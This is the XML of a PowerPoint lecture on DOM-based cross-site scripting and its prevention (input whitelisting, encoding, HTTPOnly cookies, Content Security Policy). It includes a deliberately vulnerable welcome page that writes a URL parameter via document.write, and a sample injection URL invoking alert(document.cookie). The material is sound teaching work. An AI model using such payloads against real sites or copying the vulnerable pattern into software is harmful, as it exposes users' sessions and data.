            <a:ext cx="625203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52061"/>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659088A-94C0-A8D9-220A-A11BC43647F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523874" y="1779587"/>
            <a:ext cx="7351163" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The Document Object Model is what makes dynamic, single-page applications possible. However, it is also what makes DOM-based cross-site scripting possible.</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Unlike all other types of cross-site scripting, DOM-based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0"/>
              <a:t>is purely a client-side vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>. This means that during a DOM-based XSS attack, the payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0"/>
              <a:t>never reaches the server.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> The entire attack happens in the web browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6296389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34547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297001" y="535956"/>
            <a:ext cx="625203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52061"/>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659088A-94C0-A8D9-220A-A11BC43647F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85726" y="1779588"/>
            <a:ext cx="8174036" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>DOM-based XSS is an advanced XSS attack. It is possible if the web application’s client-side scripts write data provided by the user to the Document Object Model (DOM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Again : A DOM-based XSS attack is often a client-side attack and the malicious payload is never sent to the server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>. This makes it even more difficult to detect for Web Application Firewalls (WAFs) and security engineers who analyze server logs because they will never even see the attack. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42350744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345474"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297001" y="535956"/>
            <a:ext cx="625203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a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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52061"/>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659088A-94C0-A8D9-220A-A11BC43647F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523874" y="1779588"/>
            <a:ext cx="8041627" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>DOM objects that are most often manipulated include the URL (document.URL), the anchor part of the URL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>), and the Referrer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7778729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340207"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338388" y="536931"/>
            <a:ext cx="6170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C71D0AD-4BC4-E57F-4BE0-52BC06AC19B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014412" y="2478907"/>
            <a:ext cx="7245350" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;TITLE&gt;Welcome!&lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>var pos=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.URL.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("name=")+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>document.URL.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pos,document.URL.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;BR&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Welcome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BE52D8-81C6-EAE2-E569-78A5AE327F06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200943" y="1585932"/>
            <a:ext cx="6339681" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The example below of a welcome page in a web application, which retrieves a URL parameter to populate the user’s name.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42316449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46453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338388" y="555952"/>
            <a:ext cx="6170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7B4B3D20-BB53-5262-6B2A-450C0D5F4F05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269875" y="1640284"/>
            <a:ext cx="8192989" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This page uses a URL parameter to input the user’s name, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.vulnerable.site/welcome.html?name=Jill</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But a malicious user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>can inject JavaScript code into the request, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.vulnerable.site/welcome.html?name=alert(document.cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Securing Web Applications, Part 3. Cross Site Scripting Attacks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86B4311-2D38-D265-FB5F-04C700AB5D1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3212" y="3730625"/>
            <a:ext cx="7479882"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7952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01211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397460" y="544286"/>
            <a:ext cx="62520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DOM-based Scripting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7C29DBD-FADE-F77D-F568-A90AC2F601D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731095" y="1646208"/>
            <a:ext cx="7446929" cy="3816429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The difference between DOM-based XSS attacks and other types is that the malicious code is loaded into the DOM as opposed to the website. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0"/>
              <a:t>Otherwise, it works similarly to a non-persistent XSS attack.</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 It's relatively similar to reflected XSS but the difference is that in modifying the DOM the data might not ever got to the server (which changes how it can/should be mitigated as server-side filters might not be effective).</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20590866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37551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47382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Prevention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58F7D0F-76FE-2B5C-093F-36050C82C03A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401688" y="1745972"/>
            <a:ext cx="7812054" cy="3908762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How Can You Prevent Cross-Site Scripting Attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Prevention: Reflected and Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>1. Sanitizing Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected and stored cross-site scripting can be sanitized on the server-side and there are multiple ways of doing it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Blacklisting characters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that are deemed unsafe won’t really work out in the long run since some malicious user might figure out some bypass for it as it usually happens. What you need to do is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>whitelist what is allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a security encoding library to encode all parameters and user input. If you need to insert parameters/user input data into your HTML body, add an HTML escape before insert itself. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Note : Blacklisting: by identifying characters that are not allowed. Whitelist : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00132F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Europa"/>
              </a:rPr>
              <a:t>allows only specific characters </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38905657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80232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47382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Prevention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BBAD295-E4EA-F121-D118-433E5777C457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924298" y="1779588"/>
            <a:ext cx="7249318" cy="2646878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>2. Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1"/>
              <a:t>HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t> cookie flag</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difficult to prevent all XSS flaws in your application. To reduce the impact of XSS vulnerabilities, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t> flag—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if the browser supports it, this flag ensures that cookies cannot be accessed by client side scripts, effectively blocking XSS attacks.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flag is enabled in .NET applications default, but it needs to be enabled manually in other languages.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40752609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47382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Prevention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CC73E63-180C-18F8-1C95-8A865C96F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783771" y="1633537"/>
            <a:ext cx="6645355" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>3. Implement Content Security Policy</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Content Security Policy (CSP) is another effective strategy to help mitigate the impact of XSS vulnerabilities. It is a browser-side solution that lets you create lists specifying access permissions to client side resources, such as JavaScript and CSS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>CSP uses an HTTP header to instruct the browser to execute resources only from the specified sources.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134677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4" y="396875"/>
            <a:ext cx="7553163"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47382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Cross site scripting: Prevention </a:t>
            </a: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83CB8B7-3841-7669-598F-867FD49829AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014412" y="1868488"/>
            <a:ext cx="7245350" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 'self'; script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static.domain.tld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This command instructs the web browser to only load all resources from a known source, in this example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>static.domain.tld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20342219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18893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DOS Attack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56077DE-7E6C-D537-E513-5EAF4CC5D729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303212" y="1642976"/>
            <a:ext cx="7667147" cy="3139321"/>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XSS Prevention: DOM XSS</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DOM XSS can’t be sanitized on the server-side since all execution happens on the client-side and thus the sanitization is a bit different.</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3913661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18671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References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49E1C03-D845-4BDA-B454-D66272A316E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966445" y="1935868"/>
            <a:ext cx="6228182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://www.youtube.com/watch?v=cl7__XZVodE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3931143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3684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Any Questions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09</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41625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41.6|43.7|21"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|30.6|39|15.6|19.1|17"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|9.9|30.6|28|9.6|12.6|12.9|17.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3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{81D7D76A-57CE-437A-B43A-65768C06DA4E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="aa74b998-7d02-4c65-8afd-3e7cfbd2fccf"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/term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10640</TotalTime>
  <Words>2725</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>355</Paragraphs>
  <Slides>46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Europa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267</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-03T13:03:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-29T14:39:25Z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